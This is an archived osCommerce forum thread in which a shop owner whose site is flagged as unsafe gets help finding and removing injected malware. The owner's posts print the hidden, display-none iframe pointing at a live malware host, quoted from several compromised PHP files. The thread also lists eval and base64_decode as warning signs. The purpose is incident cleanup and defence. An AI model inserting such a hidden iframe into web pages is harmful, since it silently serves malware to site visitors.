ogwinilo Posted January 4, 2010 Share Posted January 4, 2010 When opening my site, the web browser displays the folling message: "This website has been reported as unsafe www.herbalsa.com We recommend that you do not continue to this website. This website has been reported to Microsoft for containing threats to your computer that might reveal personal or financial information. This website has been reported to contain the following threats: Malicious software threat: This site contains links to viruses or other software programs that can reveal personal information stored or typed on your computer to malicious persons." This after installing an .htaccess patch and setting the permissions correctly and now I can't open my products, it says products cannot be found, yet are in the database. Only some of the new template installation changes are reflected on my site. What could be the solution these? Thanks in advance Felix Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 4, 2010 Share Posted January 4, 2010 You may well have been hacked. It does not sound as though you took all the measures necessary to secure osc. I suggest you install the Site Monitor addon and use it to check whether there are any suspicious files on your site. You can also browse the osc directories for files that should not be there - particularly look for php files in the images directory, for example and open up some of the script (php) files to see whether there is a line at the top with the word 'eval' in it. You can find details of all the measures needed to secure osc here. They all have to be done, and done on a site that has been cleaned of hacker files and code, and the database also needs to be checked for extra administrator accounts. In case there is some innocent explanation for it, to do with the way you have set the .htaccess settings and any template you have installed, you still need to take all the necessary security measures and not just install an '.htaccess patch' www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
Jan Zonjee Posted January 4, 2010 Share Posted January 4, 2010 When opening my site, the web browser displays the folling message: "This website has been reported as unsafe Indeed. At the bottom of your index page is a hidden iframe that is mentioned as an attack site hosting malicious malware: <iframe src="http:// jL . chura . pl / rc/ "·style="display:none"></iframe> See for example this page at Google In your page: </table> <iframe src="http://as_above_without_spaces" style="display:none"></iframe> </body> </html> Link to comment Share on other sites More sharing options...
ogwinilo Posted January 5, 2010 Author Share Posted January 5, 2010 Indeed. At the bottom of your index page is a hidden iframe that is mentioned as an attack site hosting malicious malware: <iframe src="http:// jL . chura . pl / rc/ "·style="display:none"></iframe> See for example this page at Google In your page: </table> <iframe src="http://as_above_without_spaces" style="display:none"></iframe> </body> </html> Link to comment Share on other sites More sharing options...
ogwinilo Posted January 5, 2010 Author Share Posted January 5, 2010 Thanks for your valuable feedback. I don't seem to locate: </table> <iframe src="http://as_above_without_spaces" style="display:none"></iframe> </body> </html> Is it in the index.php file? When I find it,do i find it (I know it feels like a stupid question). Are the suggested add ons by Ben Nevis in this post sufficient to pick it up and deal with it? Thanks again Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 5, 2010 Share Posted January 5, 2010 I suppose you could ask in the Site Monitor thread for what sort of code changes it checks for when identifying suspicious files. This might not be the only hack on your site though so this is not the only 'it' that needs to be dealt with. The thread I referred you to has links to the various threads and posts for stopping various types of hacks on osc. There is a lot to do there, and none of it will work if you don't do the first step of either restoring your site and database from an unhacked backup, which can be difficult if you don't know what to look for in deciding whether the backup is 'clean' or not, or else identifying and removing all hacker code and files manually. Site Monitor can help with this but again you need to know what sort of code to look for, which it appears you don't, so you're in a bit of a catch 22 situation. All you can do is start, use Site Monitor either on your current site or from whatever backup you choose, look at and ask questions about any files it identifies, and try to get rid of the hacks. Then you will still have to do all the other things listed in the thread I referred you to. The 'dealing with it' has to be done by you adding the addons and code changes, the changes and addons all together should secure your site to the best of knowledge of current exploits and preventing them. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted January 5, 2010 Share Posted January 5, 2010 I suppose you could ask in the Site Monitor thread for what sort of code changes it checks for when identifying suspicious files. It looks for files that have been changed, dates last modified changes, and file size changes. It does not look for code. The problem with site monitor, and it is really not a problem but its just the way it works, is that if you install site monitor to a site that has already been hacked it assumes that the hacked code is correct. You see....when you run site monitor for the first time you are telling it that what you now have is correct and site monitor makes a database of the files then on your server at that time. It then checks your site when it runs against that database and report any differences from then on. By installing site monitor on a hacked site you are not fixing anything and site monitor will not report anything out of the ordinary until something changes again. You should only install site monitor on a fresh install, and run it daily to quickly find out that you have been compromised. It will not prevent you from being hacked. That comes from other add ons. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 5, 2010 Share Posted January 5, 2010 It looks for files that have been changed, dates last modified changes, and file size changes. It does not look for code. According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
ogwinilo Posted January 5, 2010 Author Share Posted January 5, 2010 According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files. Truly humbled and appreciative of your input. I'm busy with those installs. I feel there still a long way but will keep u posted. However, and i dont know if this is associated with this, but when i open the site on my mobile phone, i get: 'My SQL Error!' The error returned was: Table 'statistics' is marked as crashed and should be repaired Error Number 1194 SELECT * FROM statistics WHERE ip='196.207.40.238' " Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 5, 2010 Share Posted January 5, 2010 According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files. Specifically, apart from changed and added files it looks for base64_decode and iframes. This can certainly be useful in identifying possibly hacked files even if it is run after hacking has taken place and the original date/timestamps and list of genuine files are unknowns. It does however have to be said that backdoors can be opened with files that don't contain either of these, and such files, even if not genuine osc files, won't be discovered simply by using Site Monitor if it is run for the first time, after hacking has already taken place. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted January 6, 2010 Share Posted January 6, 2010 According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files. You're right. It does, because I didn't read the history or dig deeper into it when I first looked at it. My mistake.. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
ogwinilo Posted January 6, 2010 Author Share Posted January 6, 2010 On installing the Site Monitor, I get the following results on checking for hacked files: <quote>Manually Check for Hacked Files Check all files for known hacker type code. Found files are suspect but not necessarily infected Checked 103 directories containing a total of 634 files. Skipped 386 files. 9 suspected hacked files found. Hacked Files Found php.ini admin/administrators.php admin/login.php admin/sitemonitor_admin.php admin/sitemonitor_configure_setup.php admin/includes/classes/nusoap.php includes/sts_template.html includes/classes/nusoap.php includes/modules/payment/paypal_standard.php </quote> Is there a tool to spot and remove the corrupted aspects/codes in these? What should I do? Thanks Felix Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 6, 2010 Share Posted January 6, 2010 On installing the Site Monitor, I get the following results on checking for hacked files: Is there a tool to spot and remove the corrupted aspects/codes in these? What should I do? Thanks Felix Short answer - no. You have to open them up and look at them. They might or might not be safe, I would suspect at least some of them probably aren't. If you only just installed Site Monitor it seems a bit unlikely it would have been immediately hacked. You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there. If you find such code, post the section containing it here and someone should be able to tell you whether it's a hack or not. Most probably it will be. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 6, 2010 Share Posted January 6, 2010 And if your admin directory is called admin, you'd better change it quick. See the links in the thread I referred you to in my post of 4th Jan, in particular the 'How to secure your site' thread. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
Jan Zonjee Posted January 6, 2010 Share Posted January 6, 2010 You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there. The iframe is still there at this moment (added spaces around dots in url) at the bottom of the HTML code (application_bottom.php? includes/footer.php?, index.php?): <table width="780" align="center" cellpadding="0" cellspacing="0"> <tr> <td><div align="center" class="style1"></div></td> </tr> </table> <iframe src="http:// jL . chura . pl /rc/" style="display:none"></iframe> </body> </html> But at least the admin section is secured with an .htacccess. Link to comment Share on other sites More sharing options...
ogwinilo Posted January 6, 2010 Author Share Posted January 6, 2010 Short answer - no. You have to open them up and look at them. They might or might not be safe, I would suspect at least some of them probably aren't. If you only just installed Site Monitor it seems a bit unlikely it would have been immediately hacked. You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there. If you find such code, post the section containing it here and someone should be able to tell you whether it's a hack or not. Most probably it will be. Appreciate your clarity. Will do. By the way, can I install IP Trap via the cPanel's File Manager or it strictly must be through FTP? Regards Felix (South Africa) Link to comment Share on other sites More sharing options...
ogwinilo Posted January 7, 2010 Author Share Posted January 7, 2010 Appreciate your clarity. Will do. By the way, can I install IP Trap via the cPanel's File Manager or it strictly must be through FTP? Regards Felix (South Africa) Of the nine possibly hacked files, I've managed to look at 4. Please look at the following code to see if my suspicions of infection are founded. Found the following codes suspected to be hacks: 1. At the bottom of; login.php, bottom of page </td> </tr> </table> <!-- body_eof //--> <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> <br> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?> 2. Also at the bottom of; admin/sitemonitor_admin.php <!-- END MANUALLY CHECK FOR HACKED FILES --> </table></td> <!-- body_text_eof //--> </tr> </table> <!-- body_eof //--> <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> <br> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?> 3. Also at the bottom of; admin/sitemonitor_configure_setup.php <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> <br> <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?> 4. The admin/includes/classes/nusoap.php file is too big but managed to extract the following code: } // eval the class eval($evalStr); // instantiate proxy object eval("\$proxy = new nusoap_proxy_$r('');"); // transfer current wsdl data to the proxy thereby avoiding parsing the wsdl twice $proxy->endpointType = 'wsdl'; /** * dynamically creates proxy class code * * @return string PHP/NuSOAP code for the proxy class * @access private */ function _getProxyClassCode($r) { $this->debug("in getProxy endpointType=$this->endpointType"); $this->appendDebug("wsdl=" . $this->varDump($this->wsdl)); if ($this->endpointType != 'wsdl') { $evalStr = 'A proxy can only be created for a WSDL client'; $this->setError($evalStr); $evalStr = "echo \"$evalStr\";"; return $evalStr; } if ($this->endpointType == 'wsdl' && is_null($this->wsdl)) { $this->loadWSDL(); if ($this->getError()) { return "echo \"" . $this->getError() . "\";"; } } $evalStr = ''; foreach ($this->operations as $operation => $opData) { if ($operation != '') { // create param string and param comment string if (sizeof($opData['input']['parts']) > 0) { $paramStr = ''; $paramArrayStr = ''; $paramCommentStr = ''; foreach ($opData['input']['parts'] as $name => $type) { $paramStr .= "\$$name, "; $paramArrayStr .= "'$name' => \$$name, "; $paramCommentStr .= "$type \$$name, "; } $paramStr = substr($paramStr, 0, strlen($paramStr)-2); $paramArrayStr = substr($paramArrayStr, 0, strlen($paramArrayStr)-2); $paramCommentStr = substr($paramCommentStr, 0, strlen($paramCommentStr)-2); } else { $paramStr = ''; $paramArrayStr = ''; $paramCommentStr = 'void'; } $opData['namespace'] = !isset($opData['namespace']) ? 'http://testuri.com' : $opData['namespace']; $evalStr .= "// $paramCommentStr function " . str_replace('.', '__', $operation) . "($paramStr) { \$params = array($paramArrayStr); return \$this->call('$operation', \$params, '".$opData['namespace']."', '".(isset($opData['soapAction']) ? $opData['soapAction'] : '')."'); } "; unset($paramStr); unset($paramCommentStr); } } $evalStr = 'class nusoap_proxy_'.$r.' extends nusoap_client { '.$evalStr.' }'; return $evalStr; } Please suggest appropriate course of action in these cases Thans a great deal Felix Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted January 7, 2010 Share Posted January 7, 2010 1,2, & 3.... OSC does not use iframes. 4. I don't recall a file called nusoap.php in the stock release of OSC. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
ogwinilo Posted January 8, 2010 Author Share Posted January 8, 2010 1,2, & 3.... OSC does not use iframes. 4. I don't recall a file called nusoap.php in the stock release of OSC. Thanx for the response. Just to confirm, would you suggest I remove them? Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted January 8, 2010 Share Posted January 8, 2010 Thanx for the response. Just to confirm, would you suggest I remove them? What i would do is ask myself: "How many add ons have I added to this install?" "How long will it take me to reinstall them if I wipe my site and install fresh?" "Do i have backup files known to be good prior to being hacked the first time? (Do I even know the first time I was hacked?)" "Do I have the skills to risk doing a manual clean of the files and go back live?" First choice is going to be wipe the site and start over, not putting it live on the internet until all security mods have been installed. Second is going to be wipe the site and reinstall from a good backup. And only if I have no other choice would I manually clean the files.. If I had to do the latter I would completely remove the site from access. Download all files to my local hard drive. Do a search for iframes with whatever means I have available to me, and delete them all. Then, take a list of filenames from a stock OSC and note all files that is a part of the stock osc. Note any files that are a part of any add on I installed. Any remaining files should be deleted. Wipe the site clean. This step is real important! Finally, upload the site files and start testing, all the while having access to the site restricted to you only. Is that what you were hoping for? Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
ogwinilo Posted January 8, 2010 Author Share Posted January 8, 2010 What i would do is ask myself: "How many add ons have I added to this install?" "How long will it take me to reinstall them if I wipe my site and install fresh?" "Do i have backup files known to be good prior to being hacked the first time? (Do I even know the first time I was hacked?)" "Do I have the skills to risk doing a manual clean of the files and go back live?" First choice is going to be wipe the site and start over, not putting it live on the internet until all security mods have been installed. Second is going to be wipe the site and reinstall from a good backup. And only if I have no other choice would I manually clean the files.. If I had to do the latter I would completely remove the site from access. Download all files to my local hard drive. Do a search for iframes with whatever means I have available to me, and delete them all. Then, take a list of filenames from a stock OSC and note all files that is a part of the stock osc. Note any files that are a part of any add on I installed. Any remaining files should be deleted. Wipe the site clean. This step is real important! Finally, upload the site files and start testing, all the while having access to the site restricted to you only. Is that what you were hoping for? Great stuff, thanks a lot Link to comment Share on other sites More sharing options...
ogwinilo Posted January 8, 2010 Author Share Posted January 8, 2010 Great stuff, thanks a lot I am trying to delete all the iframe codes manually using a notepad, I save the changes, but the next time I open the document, it's not deleted. Is there a special way I can delete these? Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 8, 2010 Share Posted January 8, 2010 1, 2, and 3 are definite hacks - it's the same code that Jan Zonjee already pointed out. nusoap.php isn't a standard osc2.2 file that I'm aware, but it does not appear to be hacker code. In another thread someone said it's a CRE secure payment module. CRE is an osc fork - is that what you are using by any chance? Anyway if you don't use that module you can remove it. As Mark said, the best thing is to start again from a believed clean backup, and install Site Monitor again to check the backup. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
♥mdtaylorlrim Posted January 8, 2010 Share Posted January 8, 2010 I am trying to delete all the iframe codes manually using a notepad, I save the changes, but the next time I open the document, it's not deleted. Is there a special way I can delete these? So, you are working with a local copy of the file. You know it's location on your hard disk. You open it. Change it. And save it. Any errors yet? No? Ok, open it. Did it revert back to the original code? Yes? Do a virus scan on your local machine. Is your shop on your local machine by chance? Were you running your shop on the internet on your local machine? Windows? If the answer to this is yes, then you seriously need to consider doing a factory restore on your local machine. The hacker most likely put code deep in your machine where you will never find it and thus you will never fix this problem. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...? Link to comment Share on other sites More sharing options...
ogwinilo Posted January 9, 2010 Author Share Posted January 9, 2010 So, you are working with a local copy of the file. You know it's location on your hard disk. You open it. Change it. And save it. Any errors yet? No? Ok, open it. Did it revert back to the original code? Yes? Do a virus scan on your local machine. Is your shop on your local machine by chance? Were you running your shop on the internet on your local machine? Windows? If the answer to this is yes, then you seriously need to consider doing a factory restore on your local machine. The hacker most likely put code deep in your machine where you will never find it and thus you will never fix this problem. Wow! This is hectic. Thanks for the tips. will do. Who would do such things, this is amazing Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.